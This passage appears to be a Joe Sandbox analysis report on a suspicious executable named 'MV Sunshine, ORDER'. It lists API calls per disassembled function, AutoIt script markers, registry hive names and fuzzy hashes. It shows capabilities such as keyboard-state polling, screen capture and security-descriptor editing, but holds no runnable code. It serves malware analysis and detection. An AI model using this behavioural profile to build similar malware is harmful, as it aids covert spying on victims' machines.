                        • Part of subcall function 009D874A: HeapAlloc.KERNEL32(00000000,?,009D822A,?,?,?), ref: 009D8786
                        • Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D879D
                        • Part of subcall function 009D87E7: GetProcessHeap.KERNEL32(00000008,009D8240,00000000,00000000,?,009D8240,?), ref: 009D87F3
                        • Part of subcall function 009D87E7: HeapAlloc.KERNEL32(00000000,?,009D8240,?), ref: 009D87FA
                        • Part of subcall function 009D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009D8240,?), ref: 009D880B
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009D8458
                      • _memset.LIBCMT ref: 009D846D
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009D848C
                      • GetLengthSid.ADVAPI32(?), ref: 009D849D
                      • GetAce.ADVAPI32(?,00000000,?), ref: 009D84DA
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009D84F6
                      • GetLengthSid.ADVAPI32(?), ref: 009D8513
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009D8522
                      • HeapAlloc.KERNEL32(00000000), ref: 009D8529
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009D854A
                      • CopySid.ADVAPI32(00000000), ref: 009D8551
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009D8582
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D85A8
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009D85BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: 389be82a96e3c2c0a3bda619e77edf6b7454fccaed344f9321daf8c40f9de248
                      • Instruction ID: f9863996c5e84c1c6ac049ab96f5249258253e2e3e7c1faec849654f8d6002af
                      • Opcode Fuzzy Hash: 389be82a96e3c2c0a3bda619e77edf6b7454fccaed344f9321daf8c40f9de248
                      • Instruction Fuzzy Hash: 02615E71940209AFDF10DF95DC45AEEBBB9FF04310F0481AAF915A7292DB319A06CF60
                      APIs
                      • GetDC.USER32(00000000), ref: 009F76A2
                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009F76AE
                      • CreateCompatibleDC.GDI32(?), ref: 009F76BA
                      • SelectObject.GDI32(00000000,?), ref: 009F76C7
                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009F771B
                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009F7757
                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009F777B
                      • SelectObject.GDI32(00000006,?), ref: 009F7783
                      • DeleteObject.GDI32(?), ref: 009F778C
                      • DeleteDC.GDI32(00000006), ref: 009F7793
                      • ReleaseDC.USER32(00000000,?), ref: 009F779E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      • Opcode ID: b1e2fe6bce51e76e83db498b6551463c3819e31923cfd5c4c105391285887c4b
                      • Instruction ID: cde3b4edf8b7d4504d8cbb4c0fde664fc5ad9a05b6c998adf6098e720cd9452b
                      • Opcode Fuzzy Hash: b1e2fe6bce51e76e83db498b6551463c3819e31923cfd5c4c105391285887c4b
                      • Instruction Fuzzy Hash: E7515A75904309EFCB25CFA8DC84EAEBBB9EF48310F14852DFA49A7210D731A841CB60
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,00A0FB78), ref: 009EA0FC
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 009EA11E
                      • __swprintf.LIBCMT ref: 009EA177
                      • __swprintf.LIBCMT ref: 009EA190
                      • _wprintf.LIBCMT ref: 009EA246
                      • _wprintf.LIBCMT ref: 009EA264
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: LoadString__swprintf_wprintf$_memmove
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 311963372-2391861430
                      • Opcode ID: 909d8a4848e2386f81a4978ba54c5259fd52d06ec70665d6a3cef46e298912fe
                      • Instruction ID: 70cf5c335d71da5404f4a7d8e423c0b428bbeba767fe632665e9101f5f8ec9ff
                      • Opcode Fuzzy Hash: 909d8a4848e2386f81a4978ba54c5259fd52d06ec70665d6a3cef46e298912fe
                      • Instruction Fuzzy Hash: 67517B71904209BBCF15FBE0CD86EEEB778AF45300F204565B515722A2EB31AF59CBA1
                      APIs
                        • Part of subcall function 009A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00986C6C,?,00008000), ref: 009A0BB7
                        • Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986D0D
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00986E5A
                        • Part of subcall function 009859CD: _wcscpy.LIBCMT ref: 00985A05
                        • Part of subcall function 009A387D: _iswctype.LIBCMT ref: 009A3885
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                      • API String ID: 537147316-1018226102
                      • Opcode ID: db8d6d6d7669bb35927f2c8c7bee939d82066ec80c68bf517fab29157c36b48b
                      • Instruction ID: 690338eb01d25fa2625c810abd020d17759e6dd0761166e3666bb1b59fc31763
                      • Opcode Fuzzy Hash: db8d6d6d7669bb35927f2c8c7bee939d82066ec80c68bf517fab29157c36b48b
                      • Instruction Fuzzy Hash: 870279311083419FC724EF24C991AAFBBE9BFD9354F14492DF48A972A2DB30D949CB42
                      APIs
                      • _memset.LIBCMT ref: 009845F9
                      • GetMenuItemCount.USER32(00A46890), ref: 009BD7CD
                      • GetMenuItemCount.USER32(00A46890), ref: 009BD87D
                      • GetCursorPos.USER32(?), ref: 009BD8C1
                      • SetForegroundWindow.USER32(00000000), ref: 009BD8CA
                      • TrackPopupMenuEx.USER32(00A46890,00000000,?,00000000,00000000,00000000), ref: 009BD8DD
                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009BD8E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                      • String ID:
                      • API String ID: 2751501086-0
                      • Opcode ID: 742dbb223c0f368a253e4d968e5dba953188a10418739897810f9c413d7abc31
                      • Instruction ID: ab9b337df44676c222e4e566f2e709c3fb2e75ba22cfd849da4e97079f91f466
                      • Opcode Fuzzy Hash: 742dbb223c0f368a253e4d968e5dba953188a10418739897810f9c413d7abc31
                      • Instruction Fuzzy Hash: 6871E47060221ABEEB319F65DC89FEABF69FF45364F200216F514A61E0DBB56C10DB90
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 3964851224-909552448
                      • Opcode ID: 79561443aec26efc3dda6d992bb000748e610a46678227b1fd82a96f0c3fba6e
                      • Instruction ID: f563a0130191a0454c4888f36efb32d185e7b68ac860267f7a2ea18b6479a2c0
                      • Opcode Fuzzy Hash: 79561443aec26efc3dda6d992bb000748e610a46678227b1fd82a96f0c3fba6e
                      • Instruction Fuzzy Hash: 0B416C7115034E8BCF14EF90E991AEA3725BFAA340F104568FD955B2D2DB30AD1ACBA0
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009BE6C9,00000010,?,Bad directive syntax error,00A0F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009DFCD2
                      • LoadStringW.USER32(00000000,?,009BE6C9,00000010), ref: 009DFCD9
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                      • _wprintf.LIBCMT ref: 009DFD0C
                      • __swprintf.LIBCMT ref: 009DFD2E
                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009DFD9D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                      • API String ID: 1506413516-4153970271
                      • Opcode ID: faf2d8ab94a2ad3c6055cc9ccae5f7962843baa76c9a8a313ec0e54c5df66f39
                      • Instruction ID: 4534a9dc301eb62bee0d9740d89ec24a9f24151ccd0c52a3f40f1410aaa985ec
                      • Opcode Fuzzy Hash: faf2d8ab94a2ad3c6055cc9ccae5f7962843baa76c9a8a313ec0e54c5df66f39
                      • Instruction Fuzzy Hash: AC215C3294021EBBCF22EFE0CC56FEE777ABF14300F044866F505621A2DA719A58DB50
                      APIs
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                        • Part of subcall function 00987A84: _memmove.LIBCMT ref: 00987B0D
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009E55D2
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009E55E8
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009E55F9
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009E560B
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009E561C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: SendString$_memmove
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2279737902-1007645807
                      • Opcode ID: dab7fbee59ee06b876861ffc6e1bcfaaed3d369b83310359f299d63d1646d448
                      • Instruction ID: 47d443f8ba4e058156b308f0681f7afa925970b946d684f5c2254843185beee5
                      • Opcode Fuzzy Hash: dab7fbee59ee06b876861ffc6e1bcfaaed3d369b83310359f299d63d1646d448
                      • Instruction Fuzzy Hash: 6A11C42455016979D720F6A2CC8AEFFBB7CFFE1F04F500829B445E61D1DE605D05CAA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 208665112-3771769585
                      • Opcode ID: 2ae3eb78d8b8121864fcc20747b7d6330aa8f4ff23b1e1b8582ead3ab645b260
                      • Instruction ID: b6cb279f5e7cb8aeeaf68950df0c59fa2e70fab56adbd0e012b1402a15a495a3
                      • Opcode Fuzzy Hash: 2ae3eb78d8b8121864fcc20747b7d6330aa8f4ff23b1e1b8582ead3ab645b260
                      • Instruction Fuzzy Hash: 8411D531904118AFCB21EB659C46FDB77ACAB81B10F0441B6F444B6092EF759E8286A1
                      APIs
                      • timeGetTime.WINMM ref: 009E521C
                        • Part of subcall function 009A0719: timeGetTime.WINMM(?,75C0B400,00990FF9), ref: 009A071D
                      • Sleep.KERNEL32(0000000A), ref: 009E5248
                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 009E526C
                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009E528E
                      • SetActiveWindow.USER32 ref: 009E52AD
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009E52BB
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 009E52DA
                      • Sleep.KERNEL32(000000FA), ref: 009E52E5
                      • IsWindow.USER32 ref: 009E52F1
                      • EndDialog.USER32(00000000), ref: 009E5302
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: c11c068193404be25415dc709b0c69aecdb4b792cba381fe0d3bfd2156dfa685
                      • Instruction ID: 23be084bec5f7d89be1fa2f53247942018575a42a854cc8fd08ec182c35ef64c
                      • Opcode Fuzzy Hash: c11c068193404be25415dc709b0c69aecdb4b792cba381fe0d3bfd2156dfa685
                      • Instruction Fuzzy Hash: 8B21A778504788EFE712DFE1EC89B2D3B6DE79634AF011424F102965B1DBA29C438763
                      APIs
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • CoInitialize.OLE32(00000000), ref: 009ED855
                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009ED8E8
                      • SHGetDesktopFolder.SHELL32(?), ref: 009ED8FC
                      • CoCreateInstance.OLE32(00A12D7C,00000000,00000001,00A3A89C,?), ref: 009ED948
                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009ED9B7
                      • CoTaskMemFree.OLE32(?,?), ref: 009EDA0F
                      • _memset.LIBCMT ref: 009EDA4C
                      • SHBrowseForFolderW.SHELL32(?), ref: 009EDA88
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009EDAAB
                      • CoTaskMemFree.OLE32(00000000), ref: 009EDAB2
                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009EDAE9
                      • CoUninitialize.OLE32(00000001,00000000), ref: 009EDAEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                      • String ID:
                      • API String ID: 1246142700-0
                      • Opcode ID: a503416b099c02b3084c159db38010470b17465f634616d8a7bcaea08d5a387c
                      • Instruction ID: 6befbfedac557a35580ee7c07614a84297edaa65b431978c30451e345fe1ed8b
                      • Opcode Fuzzy Hash: a503416b099c02b3084c159db38010470b17465f634616d8a7bcaea08d5a387c
                      • Instruction Fuzzy Hash: 72B10E75A00109AFDB14DFA5C884EAEBBB9FF89304B148469F909EB251DB31EE45CB50
                      APIs
                      • GetKeyboardState.USER32(?), ref: 009E05A7
                      • SetKeyboardState.USER32(?), ref: 009E0612
                      • GetAsyncKeyState.USER32(000000A0), ref: 009E0632
                      • GetKeyState.USER32(000000A0), ref: 009E0649
                      • GetAsyncKeyState.USER32(000000A1), ref: 009E0678
                      • GetKeyState.USER32(000000A1), ref: 009E0689
                      • GetAsyncKeyState.USER32(00000011), ref: 009E06B5
                      • GetKeyState.USER32(00000011), ref: 009E06C3
                      • GetAsyncKeyState.USER32(00000012), ref: 009E06EC
                      • GetKeyState.USER32(00000012), ref: 009E06FA
                      • GetAsyncKeyState.USER32(0000005B), ref: 009E0723
                      • GetKeyState.USER32(0000005B), ref: 009E0731
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
                      • Instruction ID: a05fe81c2eeb7e3bc4c3fc293bf6c5a270a26be92bdf142787a20a7a137bb5b4
                      • Opcode Fuzzy Hash: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
                      • Instruction Fuzzy Hash: 8851CD70A047C829FB36DBA248557EABFB89F81340F084599D5C6561C2DAE4DFCCCB61
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 009DC746
                      • GetWindowRect.USER32(00000000,?), ref: 009DC758
                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009DC7B6
                      • GetDlgItem.USER32(?,00000002), ref: 009DC7C1
                      • GetWindowRect.USER32(00000000,?), ref: 009DC7D3
                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009DC827
                      • GetDlgItem.USER32(?,000003E9), ref: 009DC835
                      • GetWindowRect.USER32(00000000,?), ref: 009DC846
                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009DC889
                      • GetDlgItem.USER32(?,000003EA), ref: 009DC897
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009DC8B4
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 009DC8C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
                      • Instruction ID: a2a7090d0e52f474b222815a5d8b8688c2da8aa40894570c5c7a899b976ef196
                      • Opcode Fuzzy Hash: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
                      • Instruction Fuzzy Hash: B85121B1B40209AFDF18CFA9DD85AAEBBBAEB88311F14812DF515E7290D7709D01CB50
                      APIs
                        • Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A
                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009820D3
                      • KillTimer.USER32(-00000001,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 0098216E
                      • DestroyAcceleratorTable.USER32(00000000), ref: 009BBEF6
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBF27
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBF3E
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBF5A
                      • DeleteObject.GDI32(00000000), ref: 009BBF6C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: 92bee375fe0348a2e337a8697e532915a53796278c754028e8abae086f380f53
                      • Instruction ID: 7235903207908c7279d9363552ecc629f4aaac0e5e61a50a799c4df3cf706d90
                      • Opcode Fuzzy Hash: 92bee375fe0348a2e337a8697e532915a53796278c754028e8abae086f380f53
